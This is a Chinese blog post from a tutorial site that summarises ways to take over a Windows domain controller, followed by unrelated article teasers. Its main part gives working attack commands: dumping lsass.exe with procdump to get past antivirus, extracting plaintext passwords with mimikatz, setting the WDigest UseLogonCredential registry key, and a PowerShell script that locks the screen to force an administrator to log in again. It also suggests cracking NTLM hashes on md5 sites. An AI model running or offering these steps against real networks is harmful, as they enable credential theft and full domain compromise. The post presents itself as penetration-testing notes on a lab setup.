首页 > 其他分享 >【待做】【域渗透】获取域控方法总结

【待做】【域渗透】获取域控方法总结

时间:2024-08-05 18:16:46浏览次数:16  
标签:exe 渗透 lsass 明文 获取 mimikatz 管理员 域控 权限

搭建虚拟环境

【域控】,192.168.10.3
【域成员】,192.168.10.4

工具

mimikatz
procdump64

在域渗透中、作为渗透测试人员,获取域控的权限基本上可以获取整个内网的权限。在大多数情况下,攻击者可以通过定位域管理员所登录的服务器,利用漏洞获取服务器system权限,找到域管理的账号、进程或是身份验证令牌,从而获取域管理员权限。本文分享几种常见的获取域管理员权限的方式。

方法 一 :通过高权限读取本地密码

当域管理员在域成员机器上登录进行工作的时候,会将明文密码保存在本地进行的lsass.exe,可以通过mimikatz来读取到本地的明文密码。


如果说,没有出现密码,那么大概率就是版本问题了。

实战中,会有很多可能出现,比如捕获不到明文密码,可以尝试从NTLM入手。

可以通过md5网站进行解密成明文。


如果主机存在杀软的时候,上传mimikatz很多时候都会被杀掉,可以通过procdump+mimikatz的方式进行绕过。
先导出lsass.exe,保存到本地,通过mimikatz读lsass.dmp的明文

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

如果目标机器是windows server 2012,通过添加注册表,在通过锁屏,让管理员重新登录及可以读取明文。

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" >1.txt

添加注册表,设置UseLogonCredential设置为1

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

利用powershell脚本进行锁屏

Function Lock-WorkStation
{
$signature = @"
[DllImport("user32.dll", SetLastError = true)]
public static extern bool LockWorkStation();
"@
$LockWorkStation = Add-Type -memberDefinition $signature -name
"Win32LockWorkStation" -namespace Win32Functions -passthru
$LockWorkStation::LockWorkStation() | Out-Null
}
Lock-WorkStation

管理员重新登录后就可以抓取到明文密码了。

删除连接过程。

标签:exe,渗透,lsass,明文,获取,mimikatz,管理员,域控,权限
From: https://www.cnblogs.com/o-O-oO/p/18343793

相关文章

  • ddns-go手动安装,配置acme获取证书,nginx反代
    ddns-go的手动安装并使用nginx反代一、下载最新ddngo软件包wgethttps://github.com/jeessy2/ddns-go/releases/download/v6.6.7/ddns-go_6.6.7_linux_x86_64.tar.gz二、手动安装ddnsgo1.创建ddnsgo目录sudomkdir/opt/ddnsgo#创建运行ddnsgo的用户sudouseradd-r-s/......
  • 获取第三方GET接口的data数据,服务器需要设置正确的 Access-Control-Allow-Origin
    在现代Web开发中,由于同源策略的限制,浏览器通常不允许从一个域名(origin)直接访问另一个域名的资源,除非服务器端设置了适当的CORS(跨源资源共享)策略。项目中如何直接获取get接口https://api.cp.139.com/cgate/cme/v1/appUpgrade/version?channel=baidu02下的接口相应对象:{"code":......
  • 十万个为什么 [Windows] 获取串口号
    #include<Windows.h>#include<SetupAPI.h>//-lsetupapi#include<devguid.h>//-luuid#include<stdio.h>#include<map>usingnamespacestd;map<string,string>get_serial_ports(){ map<string,string>por......
  • Python Telegram Bot 从数据库获取数据时出错
    我正在开发用于管理企业用途任务的电报机器人。团队负责人注册他的公司并获得唯一的ID,然后可以分配任务。问题是,当团队负责人分配任务时,他可以使用/viewtasks访问它们。但是,当员工尝试查看任务时,它会打印出“错误。您尚未注册”。似乎无法检索与用户关联的company_id,即使......
  • H5页面能否获取手机的ip
    在HTML5中,出于安全和隐私的考虑,浏览器不允许网页直接访问设备的本地IP地址。不过,可以通过一些方法间接获取到用户的公网IP地址,但这些方法通常依赖于服务器端的配合。以下是几种获取用户公网IP地址的方法:1.使用WebRTCWebRTC(WebReal-TimeCommunications)提供了一种在浏览器之间......
  • 如何获取部署在 Azure 应用服务上并通过 Microsoft 身份提供商进行身份验证的 Python
    我使用PythonDash包构建了一个Web应用程序,并将该应用程序部署在Azure应用服务上。Web应用程序当前通过Azure门户的应用程序服务使用Microsoft身份提供程序进行身份验证。但是如何获取登录用户的详细信息呢?在本地运行时如何验证我的Web应用程序?我当前的登录流......
  • 什么是邮件安全证书?如何获取邮件安全证书?
    国内药企要想获得GMP认证,除了需满足FDA对药品的审核标准之外,还明文规定需要使用邮件安全证书(S/MIME证书)与之进行加密邮件沟通。那么什么是邮件安全证书?如何获取邮件安全证书?什么是邮件安全证书?邮件安全证书,因其采用S/MIME邮件安全协议,又叫做S/MIME证书,其是一种可实现对电子邮......
  • 什么是文档签名证书?如何获取文档签名证书?
    在数字化高速发展的当今时代,各行各业都开始向数字化转型,随着国家大力倡导和积极推进数字化,电子文件的应用越来越广泛。然而,电子文件包含了个人隐私、金融交易、电子处方、合同协议等敏感信息,如何确保这些重要文件的安全性和完整性成为难题。由此,依托公钥基础设施PKI技术确保文......
  • windows 获取套接字连接状态
     GetTcpTable 和 GetTcpTable2 都是WindowsAPI中用于获取TCP连接表格的函数,但它们有一些关键的区别:GetTcpTable定义:GetTcpTable 函数用于获取TCP连接的表格信息。结构体:它使用 MIB_TCPTABLE 结构体来表示TCP连接的表格。兼容性:GetTcpTable 是早期的......
  • AMI-1 是一种有效的、具有细胞渗透性和可逆性的蛋白精氨酸 N-甲基转移酶 (PRMT) 抑制
    CAS:20324-87-2品牌:MedChemExpress(MCE)存储条件:4°C,sealedstorage,awayfrommoisture生物活性:AMI-1是一种有效的、具有细胞渗透性和可逆性的蛋白精氨酸N-甲基转移酶(PRMT) 抑制剂,IC50 为8.8人PRMT1和酵母Hmt1p分别为μM和3.0μM。AMI-1通过阻断肽-底......